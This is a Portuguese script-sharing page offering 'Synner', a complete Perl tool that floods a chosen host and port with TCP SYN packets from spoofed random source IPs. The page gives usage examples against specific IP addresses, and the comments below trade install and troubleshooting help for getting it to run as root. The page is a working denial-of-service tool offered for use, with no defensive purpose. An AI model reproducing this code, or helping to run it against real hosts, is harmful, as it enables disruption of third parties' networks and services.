Synner Novo Sys(TCP) Flooder em Perl

Publicado por Franzé Jr Magalhães 01/01/2006

[ Hits: 10.940 ]

Download flooder.pl.txt





Ferramenta muito similar a outros flooders Sys TCP. Essa trabalha mandando pacotes Sys ao host e a porta específicada. Diferente de outros flooders, Synner consome toda a conexão.

Use: ./synner.pl IP PORTA TEMPO
Ex.: ./synner.pl 200.151.20.141 80 10

É necessário que você tenha o Net::RawIP instalado.

Perceba:

# WARNING: Never tested in real world :}

Garanto que eu também não testei, mas existe um comentário na Securiteam que é uma ótima ferramenta.

Fonte:
http://www.securiteam.com/tools/6K00M0KEUW.html

  



Esconder código-fonte

#!/usr/bin/perl 
# 
# Synner.pl 
# 
# Other Spoof-DoS tool written by nuTshell 
# <carloslack at gmail dot com> 
# <http://gotfault.net/~nutshell> 
# 
# Description: 
# This small tool is similar many other tcp syn flooders out there. 
# It works sending syn tcp packets to destination host:port, 
# spoofing it`s own ip addresses by sending randon source host:port 
# packets. 
# Be carefull, becouse you really need strong link otherwise 
# you`ll get f*. Unlike panic.pl , synner.pl consumes much 
# bandwidth resources. 
# 
# Required: 
# Install Net::RawIP from cpan or get it`s .tar,gz from somewhere. 
# It`s up to you. 
# 
# This tool does SPOOF your ip. 
# 
# Run it as ROOT (Net::RawIP needs). 
# Usage: ./synner.pl <ip> <port> <time> 
# 
# Greetz goes to: Shorgen, hexdump, Codak, khz, spidersoft, 
# Barros, xgc, btaranto, Acid-Warz, F-117... 
# 
# WARNING: Never tested in real world :} 
# 

#Make sure to get and install this module from cpan: 
use Net::RawIP; 

#Display help message: 
sub usage() { 
die "Use $0 <ip> <port> <time>n"; 
} 

#Function to control synner`s execution time: 
sub get_time() { 
$finaltime = time; 
$endme = $finaltime-$begintime; 
} 

#Bit useless...: 
if (@ARGV>3) {&usage} 

$ipdest = $ARGV[0] or &usage; 
$destport = $ARGV[1] or &usage; 

#Time is required to avoid endless execution (keep in mind that synner eats bandwidth): 
$time = $ARGV[2] or &usage; 

#Source port of our packets, include as many as you want: 
@tmpport = (1756,1026,1739,4055,2001,3055,1999,2873,20000,5476,9132,6000,9000,1234); 

#2 arrays that will give us randon ip addr: 
@iparray_round1 = (1,2); 
@iparray_round2 = (0,1,2,3,4,5,6,7,8,9); 

print "[!] Synpack.pl spoof-DoS tool written by nuTshelln"; 
print "[!] You better have huge link :)n"; 
print "[!] Time: $timen"; 
print "[!] Destination victin-> $ipdest:$destportn"; 

#Set $packet as handle of our raw packets: 
$packet = new Net::RawIP; 

#Get start time: 
$begintime = $^T; 

#Call get_time(): 
get_time(); 

while($endme < $time) { 

#Now build randon xxx.xxx.xxx.xxx: 
for ($z=0;$z<4;$z++) { 

#I use number 2 for every first numbers of each octet: 
for($I=0;$I<1;$I++) { 
$ip .= 2; 
} 
#Here i keep two options for every second numbers of each octet: 
for($kick=0;$kick<1;$kick++) { 
$iparray_round1 = $iparray_round1[rand(@iparray_round1)] ; 
$ip .= $iparray_round1; 
} 
#For all the last third of each octets i use range between 0<->9: 
for($you=0;$you<1;$you++) { 
$iparray_round2 = $iparray_round2[rand(@iparray_round2)] ; 
$ip .= $iparray_round2; 
} 

#Insert dot between each octet: 
$ip .= "."; 
} 

#The last one dot must be erased: 
chop($ip); 

#Routine to create/send spoofed packets, thanks to Net::RawIP: 
$tmpport = $tmpport[rand(@tmpport)]; 
$packet->set( 
{ 
ip => { saddr => $ip, #Victin ip 
daddr => $ipdest #Victin port 
}, 

tcp => { source => $tmpport, #Source ip(Spoofed and randomized) 
dest => $destport, #source port(Randomized) 
psh => 1, 
ack => 0, 
syn => 1, 
data => '31337' 
} 
} 
); 

#Send it: 
$packet->send(0,1) ; 

print "[*] From-> $ip:randon_portr"; 

#Reset last ip for new one: 
$ip = ''; 

#Call get_time(): 
get_time(); 

} 
#That`s all folks! 
print "nDone!n"; 
#eof

Scripts recomendados

Descubra se seu e-mail ou conta foi "pwned"

PDF completo com todas as páginas do Diário Oficial do Estado de Goiás

API do Bing para traduzir textos

Postando mensagem no Facebook com Perl

Sarg Diario


  

Comentários
[1] Comentário enviado por globoleo em 22/02/2006 - 03:27h

tenho certeza que ce nunca usou

eu tbm juro que nunca usei


[2] Comentário enviado por c0cac00l em 10/10/2009 - 08:31h

Estou com um pequeno problema..

$ perl tcpflooder.pl 174.132.77.99 80 10
(rawsock) socket problems [fatal] at /usr/lib/perl5/Net/RawIP.pm line 620.
[!] Synpack.pl spoof-DoS tool written by nuTshelln[!] You better have huge link :)n[!] Time: [!] Destination victin-> 174.132.77.99:

[3] Comentário enviado por kennedyk1 em 29/09/2010 - 10:43h

Para o syn flooder funcionar, vc tem que ter instalado em seu pc, o net::rawip.

antes de instalar o net::rawip, instale o libpcap.

#apt-get install libpcap0.8-dev

baixe o net::rawip no site da Cpan

http://search.cpan.org/CPAN/authors/id/S/SA/SAPER/Net-RawIP-0.25.tar.gz

instale o net::rawip

e ai vc conseguirá rodar o synflooder.

obs: O synflooder só funfa se vc estiver no modo superusuario (root).

[4] Comentário enviado por kennedyk1 em 29/09/2010 - 10:47h

Sou mais o udp-flooder.
Roda em qlq linux sem nenhuma baboseira.
Dizem que é mais facil de ser evitado, mas qnd nao evitado, faz um estrago.

[5] Comentário enviado por removido em 29/07/2011 - 01:27h

o que pode estar causando este erro

Can't locate Net/RawIP.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.0 /usr/local/share/perl/5.10.0 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at /root/Net-RawIP-0.25/Flood.pl line 34.
BEGIN failed--compilation aborted at /root/Net-RawIP-0.25/Flood.pl line 34.

[6] Comentário enviado por removido em 29/07/2011 - 01:28h

root@Kouback-REDHAT:~/Net-RawIP-0.25# '/root/Net-RawIP-0.25/Makefile.PL'
/root/Net-RawIP-0.25/Makefile.PL: linha 1: use: comando não encontrado
/root/Net-RawIP-0.25/Makefile.PL: linha 2: use: comando não encontrado
/root/Net-RawIP-0.25/Makefile.PL: linha 3: use: comando não encontrado
/root/Net-RawIP-0.25/Makefile.PL: linha 4: use: comando não encontrado
/root/Net-RawIP-0.25/Makefile.PL: linha 5: use: comando não encontrado
/root/Net-RawIP-0.25/Makefile.PL: linha 7: erro de sintaxe próximo do `token' não esperado `('
/root/Net-RawIP-0.25/Makefile.PL: linha 7: `my %config = ('
root@Kouback-REDHAT:~/Net-RawIP-0.25# '/root/Net-RawIP-0.25/Flood.pl'
Can't locate Net/RawIP.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.0 /usr/local/share/perl/5.10.0 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at /root/Net-RawIP-0.25/Flood.pl line 34.
BEGIN failed--compilation aborted at /root/Net-RawIP-0.25/Flood.pl line 34.
root@Kouback-REDHAT:~/Net-RawIP-0.25#


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts